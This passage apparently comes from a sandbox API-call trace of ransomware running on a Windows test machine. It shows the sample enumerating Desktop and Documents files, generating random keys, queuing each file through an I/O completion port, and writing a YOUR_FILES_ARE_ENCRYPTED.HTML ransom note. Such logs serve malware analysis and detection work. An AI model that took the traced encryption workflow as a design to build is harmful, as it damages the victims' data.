lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0166.496] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=42237) returned 1 [0166.496] GetProcessHeap () returned 0x270000 [0166.496] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.497] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="2E") returned 2 [0166.497] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="6F") returned 2 [0166.497] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="0E") returned 2 [0166.497] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="47") returned 2 [0166.497] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="6F") returned 2 [0166.497] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="20") returned 2 [0166.497] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="C1") returned 2 [0166.497] wsprintfW (in: param_1=0x4ebdd5e, 
param_2="%02X" | out: param_1="FE") returned 2 [0166.497] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="BD") returned 2 [0166.498] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="0F") returned 2 [0166.498] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="5A") returned 2 [0166.498] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="1E") returned 2 [0166.498] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="18") returned 2 [0166.498] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="58") returned 2 [0166.498] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="9A") returned 2 [0166.498] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="38") returned 2 [0166.498] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="40") returned 2 [0166.498] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="11") returned 2 [0166.498] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="D7") returned 2 [0166.498] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="98") returned 2 [0166.498] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="47") returned 2 [0166.498] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="92") returned 2 [0166.498] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="1A") returned 2 [0166.498] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="C8") returned 2 [0166.498] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="6C") returned 2 [0166.498] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="06") returned 2 [0166.498] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="3C") returned 2 [0166.498] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="7C") returned 2 [0166.498] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="1E") returned 2 [0166.498] wsprintfW 
(in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="16") returned 2 [0166.498] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="BF") returned 2 [0166.498] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="09") returned 2 [0166.499] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\yTVqJ0atNbrX.jpg" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\yTVqJ0atNbrX.jpg") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\yTVqJ0atNbrX.jpg" [0166.499] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.499] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.511] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9acc97b0, ftCreationTime.dwHighDateTime=0x1d7e0b9, ftLastAccessTime.dwLowDateTime=0xd5c74a50, ftLastAccessTime.dwHighDateTime=0x1d7e12b, ftLastWriteTime.dwLowDateTime=0xd5c74a50, ftLastWriteTime.dwHighDateTime=0x1d7e12b, nFileSizeHigh=0x0, nFileSizeLow=0x375e, dwReserved0=0x0, dwReserved1=0x60, cFileName="Zzdaqes0LOc.xls", cAlternateFileName="ZZDAQE~1.XLS")) returned 1 [0166.511] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\Zzdaqes0LOc.xls") returned 47 [0166.511] lstrcmpW (lpString1="Zzdaqes0LOc.xls", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 1 [0166.511] PathFindExtensionW (pszPath="Zzdaqes0LOc.xls") returned=".xls" [0166.511] lstrlenW (lpString=".xls") returned 4 [0166.511] PathFindExtensionW (pszPath="Zzdaqes0LOc.xls") returned=".xls" [0166.511] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0166.511] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\Zzdaqes0LOc.xls" (normalized: "c:\\users\\5alr3u30d3\\desktop\\zzdaqes0loc.xls"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0166.512] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=14174) returned 1 [0166.512] GetProcessHeap () returned 0x270000 [0166.512] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.513] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="12") returned 2 [0166.513] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="85") returned 2 [0166.513] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="35") returned 2 [0166.513] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="49") returned 2 [0166.513] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="0C") returned 2 [0166.513] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="A1") returned 2 [0166.513] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="9B") returned 2 [0166.513] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="D8") returned 2 [0166.513] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="D6") returned 2 [0166.513] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="EF") returned 2 [0166.513] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="73") returned 2 [0166.513] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="93") returned 2 [0166.513] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="AC") returned 2 [0166.513] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="32") returned 2 [0166.513] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="2A") returned 2 [0166.513] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: 
param_1="47") returned 2 [0166.513] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="53") returned 2 [0166.513] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="51") returned 2 [0166.513] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="72") returned 2 [0166.513] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="94") returned 2 [0166.513] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="70") returned 2 [0166.514] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="26") returned 2 [0166.514] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="BF") returned 2 [0166.514] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="2E") returned 2 [0166.514] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="64") returned 2 [0166.514] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\Zzdaqes0LOc.xls" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\Zzdaqes0LOc.xls") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\Zzdaqes0LOc.xls" [0166.514] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.515] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.524] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9acc97b0, ftCreationTime.dwHighDateTime=0x1d7e0b9, ftLastAccessTime.dwLowDateTime=0xd5c74a50, ftLastAccessTime.dwHighDateTime=0x1d7e12b, ftLastWriteTime.dwLowDateTime=0xd5c74a50, ftLastWriteTime.dwHighDateTime=0x1d7e12b, nFileSizeHigh=0x0, nFileSizeLow=0x375e, dwReserved0=0x0, dwReserved1=0x60, cFileName="Zzdaqes0LOc.xls", cAlternateFileName="ZZDAQE~1.XLS")) returned 0 [0166.524] FindClose (in: hFindFile=0x42f3140 | 
out: hFindFile=0x42f3140) returned 1 [0166.524] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 61 [0166.524] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\desktop\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0166.525] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0166.527] CloseHandle (hObject=0x5a0) returned 1 [0166.527] GetProcessHeap () returned 0x270000 [0166.528] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0166.528] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xaedb9520, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaedb9520, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0166.528] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents") returned 33 [0166.528] GetProcessHeap () returned 0x270000 [0166.528] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0166.528] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents") 
returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents" [0166.528] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\*" [0166.528] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xaedb9520, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaedb9520, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0166.529] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xaedb9520, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaedb9520, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0166.529] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d666d50, ftCreationTime.dwHighDateTime=0x1d7ac46, ftLastAccessTime.dwLowDateTime=0xb8376780, ftLastAccessTime.dwHighDateTime=0x1d7bc60, ftLastWriteTime.dwLowDateTime=0xb8376780, ftLastWriteTime.dwHighDateTime=0x1d7bc60, nFileSizeHigh=0x0, nFileSizeLow=0x1819b, dwReserved0=0x0, dwReserved1=0x60, cFileName="0UM7 Sy2QP8qJXxkoN.pptx", cAlternateFileName="0UM7SY~1.PPT")) returned 1 [0166.529] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\0UM7 Sy2QP8qJXxkoN.pptx") returned 57 [0166.529] lstrcmpW (lpString1="0UM7 Sy2QP8qJXxkoN.pptx", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.529] PathFindExtensionW (pszPath="0UM7 Sy2QP8qJXxkoN.pptx") returned=".pptx" [0166.529] lstrlenW (lpString=".pptx") returned 5 [0166.529] PathFindExtensionW (pszPath="0UM7 Sy2QP8qJXxkoN.pptx") returned=".pptx" [0166.529] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0166.529] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\0UM7 Sy2QP8qJXxkoN.pptx" (normalized: "c:\\users\\5alr3u30d3\\documents\\0um7 sy2qp8qjxxkon.pptx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0166.530] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=98715) returned 1 [0166.530] GetProcessHeap () returned 0x270000 [0166.530] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.531] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="14") returned 2 [0166.531] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="52") returned 2 [0166.531] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="28") returned 2 [0166.531] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="1C") returned 2 [0166.531] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="B7") returned 2 [0166.531] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="4E") returned 2 [0166.531] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="56") returned 2 [0166.531] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="FB") returned 2 [0166.531] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="5D") returned 2 [0166.531] wsprintfW (in: 
param_1=0x4ebdd66, param_2="%02X" | out: param_1="9C") returned 2 [0166.531] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="0D") returned 2 [0166.531] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="92") returned 2 [0166.531] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="8C") returned 2 [0166.531] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="10") returned 2 [0166.531] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="60") returned 2 [0166.531] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="3F") returned 2 [0166.531] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="75") returned 2 [0166.531] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="19") returned 2 [0166.532] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="45") returned 2 [0166.532] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="22") returned 2 [0166.532] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="CE") returned 2 [0166.532] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="72") returned 2 [0166.532] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="EA") returned 2 [0166.532] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="09") returned 2 [0166.532] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="4B") returned 2 [0166.532] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="83") returned 2 [0166.532] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="9B") returned 2 [0166.532] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="33") returned 2 [0166.532] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="83") returned 2 [0166.532] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="07") returned 2 [0166.532] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="FB") returned 2 
[0166.532] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="33") returned 2 [0166.536] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\0UM7 Sy2QP8qJXxkoN.pptx" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\0UM7 Sy2QP8qJXxkoN.pptx") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\0UM7 Sy2QP8qJXxkoN.pptx" [0166.536] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.536] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.546] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87a20330, ftCreationTime.dwHighDateTime=0x1d776bc, ftLastAccessTime.dwLowDateTime=0xccf5ae40, ftLastAccessTime.dwHighDateTime=0x1d7cbae, ftLastWriteTime.dwLowDateTime=0xccf5ae40, ftLastWriteTime.dwHighDateTime=0x1d7cbae, nFileSizeHigh=0x0, nFileSizeLow=0x75f8, dwReserved0=0x0, dwReserved1=0x60, cFileName="5f727GEb1uMbxaoBoD.docx", cAlternateFileName="5F727G~1.DOC")) returned 1 [0166.546] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\5f727GEb1uMbxaoBoD.docx") returned 57 [0166.546] lstrcmpW (lpString1="5f727GEb1uMbxaoBoD.docx", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.547] PathFindExtensionW (pszPath="5f727GEb1uMbxaoBoD.docx") returned=".docx" [0166.547] lstrlenW (lpString=".docx") returned 5 [0166.547] PathFindExtensionW (pszPath="5f727GEb1uMbxaoBoD.docx") returned=".docx" [0166.547] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0166.547] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\5f727GEb1uMbxaoBoD.docx" (normalized: 
"c:\\users\\5alr3u30d3\\documents\\5f727geb1umbxaobod.docx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0166.547] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=30200) returned 1 [0166.547] GetProcessHeap () returned 0x270000 [0166.548] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.548] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="FD") returned 2 [0166.548] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="5E") returned 2 [0166.548] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="92") returned 2 [0166.548] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="53") returned 2 [0166.549] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="9D") returned 2 [0166.549] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="ED") returned 2 [0166.549] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="14") returned 2 [0166.549] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="93") returned 2 [0166.549] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="41") returned 2 [0166.549] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="A0") returned 2 [0166.549] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="1B") returned 2 [0166.549] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="D0") returned 2 [0166.549] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="BC") returned 2 [0166.549] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="1B") returned 2 [0166.549] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="BE") returned 2 [0166.549] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="6B") returned 2 [0166.549] wsprintfW (in: param_1=0x4ebdd82, 
param_2="%02X" | out: param_1="C3") returned 2 [0166.549] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="06") returned 2 [0166.549] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="17") returned 2 [0166.549] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="26") returned 2 [0166.549] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="40") returned 2 [0166.549] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="CC") returned 2 [0166.549] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="F6") returned 2 [0166.549] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="C1") returned 2 [0166.549] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="8B") returned 2 [0166.549] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="D2") returned 2 [0166.549] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="02") returned 2 [0166.549] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="4D") returned 2 [0166.549] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="39") returned 2 [0166.550] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="CC") returned 2 [0166.550] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="4E") returned 2 [0166.550] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="62") returned 2 [0166.550] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\5f727GEb1uMbxaoBoD.docx" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\5f727GEb1uMbxaoBoD.docx") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\5f727GEb1uMbxaoBoD.docx" [0166.550] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.550] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, 
lpOverlapped=0x74c2008) returned 1 [0166.559] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac8508a0, ftCreationTime.dwHighDateTime=0x1d78d87, ftLastAccessTime.dwLowDateTime=0x7fd60360, ftLastAccessTime.dwHighDateTime=0x1d7949c, ftLastWriteTime.dwLowDateTime=0x7fd60360, ftLastWriteTime.dwHighDateTime=0x1d7949c, nFileSizeHigh=0x0, nFileSizeLow=0x2a92, dwReserved0=0x0, dwReserved1=0x60, cFileName="6_F-VHS8UQkYkU.pptx", cAlternateFileName="6_F-VH~1.PPT")) returned 1 [0166.559] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\6_F-VHS8UQkYkU.pptx") returned 53 [0166.559] lstrcmpW (lpString1="6_F-VHS8UQkYkU.pptx", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.559] PathFindExtensionW (pszPath="6_F-VHS8UQkYkU.pptx") returned=".pptx" [0166.559] lstrlenW (lpString=".pptx") returned 5 [0166.559] PathFindExtensionW (pszPath="6_F-VHS8UQkYkU.pptx") returned=".pptx" [0166.559] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0166.559] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\6_F-VHS8UQkYkU.pptx" (normalized: "c:\\users\\5alr3u30d3\\documents\\6_f-vhs8uqkyku.pptx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0166.560] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=10898) returned 1 [0166.560] GetProcessHeap () returned 0x270000 [0166.560] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.561] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="F7") returned 2 [0166.561] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="C9") returned 2 [0166.561] wsprintfW (in: param_1=0x4ebdd4a, 
